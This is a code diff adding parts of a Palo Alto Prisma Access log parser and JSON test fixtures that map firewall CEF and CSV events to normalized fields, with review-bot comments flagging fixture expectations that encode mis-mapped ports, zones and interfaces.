paloalto.PanOSSDWANDeviceType: "{{parsed_event.message.PanOSSDWANDeviceType | replace('\x00', '')}}" + paloalto.PanOSSDWANPolicyName: "{{parsed_event.message.PanOSSDWANPolicyName | replace('\x00', '')}}" + paloalto.PanOSSDWANSite: "{{parsed_event.message.PanOSSDWANSite | replace('\x00', '')}}" + paloalto.PanOSSessionStartTime: "{{parsed_event.message.PanOSSessionStartTime | replace('\x00', '')}}" + paloalto.PanOSSourceDeviceHost: "{{parsed_event.message.PanOSSourceDeviceHost | replace('\x00', '')}}" + paloalto.PanOSSourceDeviceModel: "{{parsed_event.message.PanOSSourceDeviceModel | replace('\x00', '')}}" + paloalto.PanOSSourceDeviceProfile: "{{parsed_event.message.PanOSSourceDeviceProfile | replace('\x00', '')}}" + paloalto.PanOSSourceDeviceVendor: "{{parsed_event.message.PanOSSourceDeviceVendor | replace('\x00', '')}}" + paloalto.PanOSSourceDynamicAddressGroup: "{{parsed_event.message.PanOSSourceDynamicAddressGroup | replace('\x00', '')}}" + paloalto.PanOSSourceEDL: "{{parsed_event.message.PanOSSourceEDL | replace('\x00', '')}}" + paloalto.PanOSSourceLocation: "{{parsed_event.message.PanOSSourceLocation | replace('\x00', '')}}" + paloalto.PanOSSourceUUID: "{{parsed_event.message.PanOSSourceUUID | replace('\x00', '')}}" + paloalto.PanOSThreatCategory: "{{parsed_event.message.PanOSThreatCategory | replace('\x00', '')}}" + paloalto.PanOSThreatID: "{{parsed_event.message.PanOSThreatID | replace('\x00', '')}}" + paloalto.PanOSVirtualSystemName: "{{parsed_event.message.PanOSVirtualSystemName | replace('\x00', '')}}" + paloalto.PanOSX-Forwarded-ForIP: "{{parsed_event.message['PanOSX-Forwarded-ForIP'] | replace('\x00', '')}}" + paloalto.URLCategory: "{{parsed_event.message.URLCategory | replace('x00', '')}}" + paloalto.VirtualLocation: "{{parsed_event.message.VirtualLocation | replace('x00', '')}}" + paloalto.VirtualSystemID: "{{parsed_event.message.VirtualSystemID | replace('x00', '')}}" + paloalto.VirtualSystemName: "{{parsed_event.message.VirtualSystemName | 
replace('x00', '')}}" + paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}" + paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}" + paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}" + paloalto.connection.method: "{{parsed_event.message.ConnectionMethod or parsed_event.message.PanOSConnectionMethod}}" + paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}" + paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}" + paloalto.threat.name: "{{parsed_threat.message.threat_description}}" + - set: + source.user.name: "{{parsed_event.message.SourceUser}}" + user.name: "{{parsed_event.message.SourceUser}}" + filter: '{{parsed_event.message.SourceUser.startswith("x-fwd-for") == False}}' + + - set: + user.email: "{{parsed_event.message.SourceUser}}" + filter: "{{parsed_event.message.SourceUser != None and '@' in parsed_event.message.SourceUser}}" + + - set: + paloalto.dns.category: "{{parsed_event.message.DNSCategory}}" + dns.question.type: "{{parsed_event.message.RecordType}}" + dns.resolved_ip: "{{parsed_event.message.DNSResponse}}" + + - set: + paloalto.source.region: "{{parsed_event.message.SourceRegion}}" + filter: "{{parsed_event.message.Subtype == 'globalprotect'}}" + + - set: + paloalto.source.private.ip: "{{parsed_event.message.PrivateIPv4}}" + filter: "{{parsed_event.message.PrivateIPv4 | is_ipaddress}}" + + - set: + paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack}}" + paloalto.threat.category: "{{parsed_event.message.ThreatCategory}}" + + - set: + threat.indicator.name: "{{parsed_event.message.URL}}" + + set_finalize_user_name: + actions: + - set: + user.domain: '{{final.user.name.split("\\") | first}}' + user.name: '{{final.user.name.split("\\") | last}}' + filter: 
'{{final.user.name != null and "\\" in final.user.name}}' + - set: + user.domain: '{{final.user.email.split("@") | first}}' + user.name: '{{final.user.email.split("@") | last}}' + filter: '{{final.user.email != null and "@" in final.user.email}}' + - set: + source.user.domain: '{{final.source.user.name.split("\\") | first}}' + source.user.name: '{{final.source.user.name.split("\\") | last}}' + filter: '{{final.source.user.name != null and "\\" in final.source.user.name}}' + - set: + destination.user.domain: '{{final.destination.user.name.split("\\") | first}}' + destination.user.name: '{{final.destination.user.name.split("\\") | last}}' + filter: '{{final.destination.user.name != null and "\\" in final.destination.user.name}}' + + set_category_fields: + actions: + - set: + event.category: ["network"] + event.type: ["info"] + - set: + event.category: ["authentication"] + event.type: ["info"] + filter: '{{final.log.logger in ["auth", "userid"] or (final.log.logger == "system" and parsed_event.message.Subtype == "auth")}}' + - set: + event.category: ["host"] + event.type: ["info"] + filter: '{{final.log.logger == "system" and parsed_event.message.Subtype == "general"}}' + - set: + event.category: ["session"] + event.type: ["info"] + filter: '{{final.log.logger == "globalprotect"}}' + - translate: + dictionary: + "login": ["start"] + "connected": ["start"] + mapping: + paloalto.connection.stage: event.type + fallback: ["info"] + filter: '{{final.log.logger == "globalprotect"}}' + - translate: + dictionary: + login: ["start"] + logout: ["end"] + "auth-success": ["start"] + mapping: + parsed_event.message.Subtype: event.type + parsed_event.message.Name: event.type + parsed_event.message.EventID: event.type + filter: '{{final.log.logger in ["userid", "system"]}}' + - translate: + dictionary: + spyware: ["malware"] + virus: ["malware"] + wildfire-virus: ["malware"] + vulnerability: ["vulnerability"] + file: ["file"] + data: ["file"] + flood: ["network"] + packet: 
["network"] + scan: ["network"] + url: ["network"] + wildfire: ["malware"] + mapping: + parsed_event.message.Name: event.category + parsed_event.message.Subtype: event.category + filter: '{{final.log.logger == "threat"}}' + - translate: + dictionary: + "start": ["start"] + "end": ["end"] + "drop": ["denied"] + "denied": ["denied"] + "deny": ["denied"] + "allow": ["allowed"] + mapping: + parsed_event.message.act: event.type + parsed_event.message.Subtype: event.type + filter: '{{final.log.logger == "traffic"}}' diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json new file mode 100644 index 000000000..08c69d61f --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json 
@@ -0,0 +1,59 @@
+{
+ "input": {
+ "message": "1,2020/12/04 16:00:02,016401002222,USERID,login,2305,2020/12/04 16:00:02,vsys,1.2.3.4,user1,srv1.example.local,0,1,12000,0,0,active-directory,,968683723,0x8000000000000000,12,0,0,0,,hostexample,1,,2020/12/04 16:00:02,1,0x80,user1"
+ },
+ "expected": {
+ "message": "1,2020/12/04 16:00:02,016401002222,USERID,login,2305,2020/12/04 16:00:02,vsys,1.2.3.4,user1,srv1.example.local,0,1,12000,0,0,active-directory,,968683723,0x8000000000000000,12,0,0,0,,hostexample,1,,2020/12/04 16:00:02,1,0x80,user1",
+ "event": {
+ "category": [
+ "authentication"
+ ],
+ "dataset": "userid",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2020-12-04T16:00:02Z",
+ "action": {
+ "type": "login"
+ },
+ "destination": {
+ "port": 0
+ },
+ "log": {
+ "hostname": "hostexample",
+ "logger": "userid"
+ },
+ "observer": {
+ "name": "hostexample",
+ "product": "PAN-OS",
+ "serial_number": "016401002222"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "12",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "EventID": "0",
+ "Threat_ContentType": "login",
+ "VirtualLocation": "vsys",
+ "VirtualSystemID": "1"
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "user1"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 0
+ },
+ "user": {
+ "name": "user1"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json
new file mode 100644
index 000000000..539963216
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json
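Review bot: The expectation pins `"source": {"port": 0}` and `"destination": {"port": 0}` for a USERID login record, where the CSV port columns are 0 because no port applies to a user-mapping event; asserting them here bakes a placeholder port into every User-ID event and will pollute aggregations and detections that key on `source.port`/`destination.port`. The column-to-field mapping for the CSV path is outside this chunk, so I cannot point at the exact stage, but the port assignments should sit behind a non-zero guard along the lines of `filter: "{{parsed_event.message.SourcePort | int > 0}}"` (using whatever key the CSV stage exposes), with these fixtures updated to omit the two `port` entries. User_id_2_csv.json pins the same zero ports.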
@@ -0,0 +1,59 @@
+{
+ "input": {
+ "message": "1,2020/12/04 16:00:02,01640103000,USERID,login,2200,2020/12/04 16:00:02,vsys,10.0.0.2,user1,srv1.example.local,0,1,13000,0,0,active-directory,,968700000,0x8000000000000000,12,0,0,0,,hostname_example,1,,2020/12/04 16:00:02,1,0x0,user1"
+ },
+ "expected": {
+ "message": "1,2020/12/04 16:00:02,01640103000,USERID,login,2200,2020/12/04 16:00:02,vsys,10.0.0.2,user1,srv1.example.local,0,1,13000,0,0,active-directory,,968700000,0x8000000000000000,12,0,0,0,,hostname_example,1,,2020/12/04 16:00:02,1,0x0,user1",
+ "event": {
+ "category": [
+ "authentication"
+ ],
+ "dataset": "userid",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2020-12-04T16:00:02Z",
+ "action": {
+ "type": "login"
+ },
+ "destination": {
+ "port": 0
+ },
+ "log": {
+ "hostname": "hostname_example",
+ "logger": "userid"
+ },
+ "observer": {
+ "name": "hostname_example",
+ "product": "PAN-OS",
+ "serial_number": "01640103000"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "12",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "EventID": "0",
+ "Threat_ContentType": "login",
+ "VirtualLocation": "vsys",
+ "VirtualSystemID": "1"
+ },
+ "related": {
+ "ip": [
+ "10.0.0.2"
+ ],
+ "user": [
+ "user1"
+ ]
+ },
+ "source": {
+ "address": "10.0.0.2",
+ "ip": "10.0.0.2",
+ "port": 0
+ },
+ "user": {
+ "name": "user1"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json
new file mode 100644
index 000000000..ff12d8db6
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|AUTH|Radius|3|ProfileToken=xxxxx dtz=UTC rt=Feb 28 2021 18:20:54 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion=10.0 PanOSAuthenticatedUserDomain=paloaltonetwork PanOSAuthenticatedUserName=xxxxx PanOSAuthenticatedUserUUID= PanOSClientTypeName= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= start=Feb 28 2021 18:20:40 cs3=vsys1 cs3Label=VirtualLocation c6a2=::ffff:0 c6a2Label=Source IPv6 Address c6a3=::ffff:0 c6a3Label=Destination IPv6 Address duser=paloaltonetwork\\\\xxxxx cs2=paloaltonetwork\\\\xxxxx cs2Label=NormalizeUser fname=Authentication object2 cs4=DC cs4Label=AuthenticationPolicy cnt=33554432 cn2=-5257671089978343424 cn2Label=MFAAuthenticationID PanOSMFAVendor=Symantec VIP cs6=rs-logging cs6Label=LogSetting cs1=deny-attackers cs1Label=AuthServerProfile PanOSAuthenticationDescription=www.something cs5=Unknown cs5Label=ClientType msg=Invalid Certificate cn1=0 cn1Label=AuthFactorNo externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSVirtualSystemID=1 PanOSAuthenticationProtocol=EAP-TTLS with PAP PanOSRuleMatchedUUID= PanOSTimeGeneratedHighResolution=Feb 28 2021 18:20:41 PanOSSourceDeviceCategory=src_category_list-1 PanOSSourceDeviceProfile=src_profile_list-1 PanOSSourceDeviceModel=src_model_list-1 PanOSSourceDeviceVendor=src_vendor_list-1 PanOSSourceDeviceOSFamily=src_osfamily_list-0 PanOSSourceDeviceOSVersion=src_osversion_list-2 PanOSSourceDeviceHost=src_host_list-0 PanOSSourceDeviceMac=src_mac_list-2 PanOSAuthCacheServiceRegion= PanOSUserAgentString= PanOSSessionID=" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|AUTH|Radius|3|ProfileToken=xxxxx dtz=UTC 
rt=Feb 28 2021 18:20:54 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion=10.0 PanOSAuthenticatedUserDomain=paloaltonetwork PanOSAuthenticatedUserName=xxxxx PanOSAuthenticatedUserUUID= PanOSClientTypeName= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= start=Feb 28 2021 18:20:40 cs3=vsys1 cs3Label=VirtualLocation c6a2=::ffff:0 c6a2Label=Source IPv6 Address c6a3=::ffff:0 c6a3Label=Destination IPv6 Address duser=paloaltonetwork\\\\xxxxx cs2=paloaltonetwork\\\\xxxxx cs2Label=NormalizeUser fname=Authentication object2 cs4=DC cs4Label=AuthenticationPolicy cnt=33554432 cn2=-5257671089978343424 cn2Label=MFAAuthenticationID PanOSMFAVendor=Symantec VIP cs6=rs-logging cs6Label=LogSetting cs1=deny-attackers cs1Label=AuthServerProfile PanOSAuthenticationDescription=www.something cs5=Unknown cs5Label=ClientType msg=Invalid Certificate cn1=0 cn1Label=AuthFactorNo externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSVirtualSystemID=1 PanOSAuthenticationProtocol=EAP-TTLS with PAP PanOSRuleMatchedUUID= PanOSTimeGeneratedHighResolution=Feb 28 2021 18:20:41 PanOSSourceDeviceCategory=src_category_list-1 PanOSSourceDeviceProfile=src_profile_list-1 PanOSSourceDeviceModel=src_model_list-1 PanOSSourceDeviceVendor=src_vendor_list-1 PanOSSourceDeviceOSFamily=src_osfamily_list-0 PanOSSourceDeviceOSVersion=src_osversion_list-2 PanOSSourceDeviceHost=src_host_list-0 PanOSSourceDeviceMac=src_mac_list-2 PanOSAuthCacheServiceRegion= PanOSUserAgentString= PanOSSessionID=", + "event": { + "category": [ + "authentication" + ], + "dataset": "auth", + "severity": 3, + "start": "2021-02-28T18:20:40Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-02-28T18:20:54Z", + 
"action": { + "type": "radius" + }, + "destination": { + "user": { + "domain": "paloaltonetwork", + "name": "xxxxx" + } + }, + "host": { + "hostname": "xxxxx", + "id": "xxxxxxxxxxxxx", + "mac": "src_mac_list-2", + "name": "xxxxx", + "os": { + "family": "src_osfamily_list-0", + "version": "src_osversion_list-2" + }, + "type": "src_category_list-1" + }, + "log": { + "hostname": "xxxxx", + "logger": "auth" + }, + "observer": { + "egress": { + "interface": { + "alias": "Unknown" + } + }, + "ingress": { + "interface": { + "alias": "DC" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "PanOSSourceDeviceHost": "src_host_list-0", + "PanOSSourceDeviceModel": "src_model_list-1", + "PanOSSourceDeviceProfile": "src_profile_list-1", + "PanOSSourceDeviceVendor": "src_vendor_list-1", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "xxxxx" + ], + "user": [ + "xxxxx" + ] + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json new file mode 100644 index 000000000..1a4fba4b4 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json 
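Review bot: The expected block pins `observer.ingress.interface.alias: "DC"` and `observer.egress.interface.alias: "Unknown"`, yet in this AUTH event the input labels `cs4` as `AuthenticationPolicy` and `cs5` as `ClientType` (see `cs4Label`/`cs5Label`), so these values are not zones and the fixture is asserting a mis-mapping produced by the unconditional `FromZone or cs4` / `ToZone or cs5` fallbacks in the parser's generic `set` action. Suggest moving those two alias assignments into their own `- set:` guarded on the label, e.g. `filter: "{{parsed_event.message.FromZone != None or parsed_event.message.cs4Label == 'FromZone'}}"` (assuming the CEF stage exposes `cs4Label` under `parsed_event.message` the way it exposes the other extension keys), and dropping the two alias values from this expectation. If the authentication policy and client type are worth keeping, they belong in vendor-specific `paloalto.*` fields rather than in observer interface fields.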
@@ -0,0 +1,97 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|DECRYPTION|end|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion=null start=Mar 01 2021 20:35:54 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-all-employees cs1Label=Rule suser=paloaltonetwork\\\\\\\\xxxxx duser=paloaltonetwork\\\\\\\\xxxxx app=gmail-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=ethernet1/1 deviceOutboundInterface=tunnel.901 cs6=test cs6Label=LogSetting PanOSTimeReceivedManagementPlane=Dec 12 2019 22:16:48 cn1=106112 cn1Label=SessionID cnt=1 spt=16524 dpt=20122 sourceTranslatedPort=15856 destinationTranslatedPort=10128 proto=tcp act=deny PanOSTunnel=N/A PanOSSourceUUID= PanOSDestinationUUID= PanOSRuleUUID=fnullacnullnulle1-2c69-4f2b-8293-46ee4c73737e PanOSClientToFirewall=null PanOSFirewallToClient=null PanOSTLSVersion=null PanOSTLSKeyExchange=null PanOSTLSEncryptionAlgorithm=null PanOSTLSAuth=null PanOSPolicyName= PanOSEllipticCurve= PanOSErrorIndex=null PanOSRootStatus=null PanOSChainStatus=null PanOSProxyType=null PanOSCertificateSerial= PanOSFingerprint= PanOSTimeNotBefore=0 PanOSTimeNotAfter=0 PanOSCertificateVersion=null PanOSCertificateSize=0 PanOSCommonNameLength=0 PanOSIssuerNameLength=0 PanOSRootCNLength=0 PanOSSNILength=0 PanOSCertificateFlags=0 PanOSCommonName= PanOSIssuerCommonName= PanOSRootCommonName= PanOSServerNameIndication= PanOSErrorMessage= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup=test PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= 
PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= externalId=xxxxxxxxxxxxx" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|DECRYPTION|end|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion=null start=Mar 01 2021 20:35:54 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-all-employees cs1Label=Rule suser=paloaltonetwork\\\\\\\\xxxxx duser=paloaltonetwork\\\\\\\\xxxxx app=gmail-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=ethernet1/1 deviceOutboundInterface=tunnel.901 cs6=test cs6Label=LogSetting PanOSTimeReceivedManagementPlane=Dec 12 2019 22:16:48 cn1=106112 cn1Label=SessionID cnt=1 spt=16524 dpt=20122 sourceTranslatedPort=15856 destinationTranslatedPort=10128 proto=tcp act=deny PanOSTunnel=N/A PanOSSourceUUID= PanOSDestinationUUID= PanOSRuleUUID=fnullacnullnulle1-2c69-4f2b-8293-46ee4c73737e PanOSClientToFirewall=null PanOSFirewallToClient=null PanOSTLSVersion=null PanOSTLSKeyExchange=null PanOSTLSEncryptionAlgorithm=null PanOSTLSAuth=null PanOSPolicyName= PanOSEllipticCurve= PanOSErrorIndex=null PanOSRootStatus=null PanOSChainStatus=null PanOSProxyType=null PanOSCertificateSerial= PanOSFingerprint= PanOSTimeNotBefore=0 PanOSTimeNotAfter=0 PanOSCertificateVersion=null PanOSCertificateSize=0 PanOSCommonNameLength=0 PanOSIssuerNameLength=0 PanOSRootCNLength=0 PanOSSNILength=0 PanOSCertificateFlags=0 PanOSCommonName= PanOSIssuerCommonName= PanOSRootCommonName= PanOSServerNameIndication= PanOSErrorMessage= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= 
PanOSDestinationDynamicAddressGroup=test PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= externalId=xxxxxxxxxxxxx", + "event": { + "action": "deny", + "category": [ + "network" + ], + "dataset": "decryption", + "severity": 3, + "start": "2021-03-01T20:35:54Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-03-01T20:35:54Z", + "action": { + "type": "end" + }, + "destination": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 10128 + }, + "port": 20122, + "user": { + "domain": "paloaltonetwork", + "name": "xxxxx" + } + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "gmail-base", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "alias": "ethernet4Zone-test1", + "id": "tunnel.901", + "name": "tunnel.901" + } + }, + "ingress": { + "interface": { + "alias": "datacenter", + "id": "tunnel.901", + "name": "1" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "VirtualLocation": "vsys1" + }, + "related": { + "ip": [ + "1.1.1.1" + ], + "user": [ + "xxxxx" + ] + }, + "rule": { + "name": "allow-all-employees", + "uuid": "fnullacnullnulle1-2c69-4f2b-8293-46ee4c73737e" + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 15856 + }, + "port": 16524, + "user": { + "domain": "paloaltonetwork", + "name": "xxxxx" + } + }, + "user": { + "domain": "paloaltonetwork", + "name": "xxxxx" + } + } +} \ No newline at 
end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json new file mode 100644 index 000000000..2da36f33e --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json 
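Review bot: The expectation pins `observer.ingress.interface.id: "tunnel.901"` and `observer.ingress.interface.name: "1"`, but the input's inbound interface is `deviceInboundInterface=ethernet1/1` and `tunnel.901` is the outbound one; the ingress values look like the egress id plus a fragment of the inbound name, so this fixture locks in a bug rather than documenting intended behaviour. The only ingress mapping visible in this chunk is `observer.ingress.interface.name: "{{parsed_description.message.intf}}"`, so the stage that builds `parsed_description` (outside this chunk) is presumably where the fragment comes from and is worth checking before the expectation is accepted. file_cef.json pins the same kind of fragment (`name: "9"` against `ethernet1/19`). The expected ingress name should be `ethernet1/1` here and `ethernet1/19` there, and the ingress id here should not be the egress interface.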
@@ -0,0 +1,97 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|file|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:06 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= PanOSApplicationCategory=collaboration PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=email PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=PA-5220 PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDLPVersionFlag= PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom= duser= duid= PanOSFileType=PNG File Upload PanOSInboundInterfaceDetailsPort=19 PanOSInboundInterfaceDetailsSlot=1 PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted= PanOSIsDuplicateLog=false PanOSIsEncrypted= PanOSIsIPV6= PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded= PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 PanOSOutboundInterfaceDetailsPort=19 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSProfileName= PanOSSanctionedStateOfApp=false PanOSSeverity=Low PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom= suser= suid= PanOSThreatCategory= PanOSThreatNameFirewall= PanOSTunneledApplication=untunneled PanOSURL= PanOSUsers=1.1.1.1 PanOSVirtualSystemID=1 start=Mar 01 2021 21:06:06 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=dg-log-policy 
cs1Label=Rule suser0= duser0= app=smtp cs3=smtp cs3Label=VirtualLocation cs4=tap cs4Label=FromZone cs5=tap cs5Label=ToZone deviceInboundInterface=ethernet1/19 deviceOutboundInterface=ethernet1/19 cs6=test cs6Label=LogSetting cn1=4016143 cn1Label=SessionID cnt=9 spt=37404 dpt=25 sourceTranslatedPort=0 destinationTranslatedPort=0 proto=tcp act=alert filePath=page-icon.png cs2=any cs2Label=URLCategory flexString2=client to server flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=1.1.1.1-1.1.1.1 PanOSDestinationLocation=1.1.1.1-1.1.1.1 fileId=0 PanOSFileHash= PanOSReportID= PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStartTime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSContentVersion= PanOSSigFlags=0 PanOSRuleUUID= PanOSHTTP2Connection= PanOSDynamicUserGroup= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSReasonForDataFilteringAction= PanOSJustification= PanOSNSSAINetworkSliceType=" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|file|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:06 
